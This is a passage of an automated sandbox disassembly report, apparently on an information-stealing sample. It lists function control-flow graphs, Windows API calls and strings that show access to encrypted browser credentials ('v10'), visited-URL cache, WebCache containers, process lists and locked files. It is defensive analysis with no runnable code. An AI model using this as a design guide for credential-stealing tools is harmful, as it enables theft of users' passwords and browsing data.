                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                              • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                              • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                                                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                                                                                                                                              • String ID: chp$v10
                                                                                                                                                                                                                              • API String ID: 4165125987-2783969131
                                                                                                                                                                                                                              • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                                                                                                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 530 40e497-40e49f free 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 553 40e3c3-40e3c6 550->553 551->552 554 40e416-40e427 memcpy 552->554 555 40e42a-40e42f 552->555 553->541 554->555 556 40e431-40e442 memcpy 555->556 557 40e445-40e44a 555->557 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                              • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                                              • API String ID: 3849927982-2252543386
                                                                                                                                                                                                                              • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                                                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 601 4094f7-4094fa call 424f26 598->601 600->567 601->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 615 4093e4-4093fb call 4253af * 2 613->615 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->601 627 409401-409403 615->627 616->617 618 409333-409345 memcmp 617->618 619 4092e5-4092ec 617->619 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                                              • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                              • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                                                                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 free 643->646 648 413edb-413ee2 645->648 646->648 656 413ee4 648->656 657 413ee7-413efe 648->657 662 413ea2-413eae CloseHandle 650->662 654 413e61-413e68 651->654 655 413e37-413e44 GetModuleHandleW 651->655 654->650 658 413e6a-413e76 654->658 655->654 660 413e46-413e5c GetProcAddress 655->660 656->657 657->638 658->650 660->654 662->641
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                                                                              • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                              • API String ID: 1344430650-1740548384
                                                                                                                                                                                                                              • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                                                                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                              • String ID: bhv
                                                                                                                                                                                                                              • API String ID: 4234240956-2689659898
                                                                                                                                                                                                                              • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                              • API String ID: 2941347001-70141382
                                                                                                                                                                                                                              • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                                                                                              • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 696 4466f4-44670e call 446904 GetModuleHandleA 699 446710-44671b 696->699 700 44672f-446732 696->700 699->700 702 44671d-446726 699->702 701 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 700->701 711 4467ac-4467b7 __setusermatherr 701->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 701->712 704 446747-44674b 702->704 705 446728-44672d 702->705 704->700 706 44674d-44674f 704->706 705->700 708 446734-44673b 705->708 710 446755-446758 706->710 708->700 709 44673d-446745 708->709 709->710 710->701 711->712 715 446810-446819 712->715 716 44681e-446825 712->716 717 4468d8-4468dd call 44693d 715->717 718 446827-446832 716->718 719 44686c-446870 716->719 723 446834-446838 718->723 724 44683a-44683e 718->724 721 446845-44684b 719->721 722 446872-446877 719->722 727 446853-446864 GetStartupInfoW 721->727 728 44684d-446851 721->728 722->719 723->718 723->724 724->721 726 446840-446842 724->726 726->721 729 446866-44686a 727->729 730 446879-44687b 727->730 728->726 728->727 731 44687c-446894 GetModuleHandleA call 41276d 729->731 730->731 734 446896-446897 exit 731->734 735 44689d-4468d6 _cexit 731->735 734->735 735->717
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2827331108-0
                                                                                                                                                                                                                              • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                                              • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                                                                                              • String ID: visited:
                                                                                                                                                                                                                              • API String ID: 1157525455-1702587658
                                                                                                                                                                                                                              • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 762 40e175-40e1a1 call 40695d call 406b90 767 40e1a7-40e1e5 memset 762->767 768 40e299-40e2a8 call 4069a3 762->768 770 40e1e8-40e1fa call 406e8f 767->770 774 40e270-40e27d call 406b53 770->774 775 40e1fc-40e219 call 40dd50 * 2 770->775 774->770 780 40e283-40e286 774->780 775->774 786 40e21b-40e21d 775->786 783 40e291-40e294 call 40aa04 780->783 784 40e288-40e290 free 780->784 783->768 784->783 786->774 787 40e21f-40e235 call 40742e 786->787 787->774 790 40e237-40e242 call 40aae3 787->790 790->774 793 40e244-40e26b _snwprintf call 40a8d0 790->793 793->774
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                              • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
